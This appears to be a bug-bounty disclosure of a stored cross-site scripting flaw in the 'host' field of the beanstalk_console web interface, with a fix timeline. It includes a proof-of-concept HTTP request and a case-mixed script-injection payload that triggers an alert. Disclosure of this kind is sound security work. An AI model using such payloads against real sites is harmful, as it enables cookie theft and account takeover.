Cross-site Scripting (XSS) - Stored in ptrofimov/beanstalk_console

Valid

Reported on

Feb 8th 2022


Description

Stored XSS in parameter 'host' when add server

Proof of Concept

// PoC.req
GET / HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1:8088/
Cookie: PHPSESSID=annqppb7s8u647f8tquflpmfp4; beansServers=localhost%22%3E%3CsCrIpt%3Ealert(%22XsS%22)%3C%2FscRiPt%3E%3A11300
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Step to Reproduct

Goto Beanstalk console and choose to Add server

At field host input with payload : localhost"><sCrIpt>alert("XsS")</scRiPt>

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the ptrofimov/beanstalk_console team within 24 hours. 4 months ago
lethanhphuc submitted a
4 months ago
ptrofimov validated this vulnerability 4 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
ptrofimov confirmed that a fix has been merged on 5aea5f 4 months ago
lethanhphuc has been awarded the fix bounty
serversList.php#L72 has been validated
serversList.php#L47-L49 has been validated
main.php#L68 has been validated
main.php#L80 has been validated
to join this conversation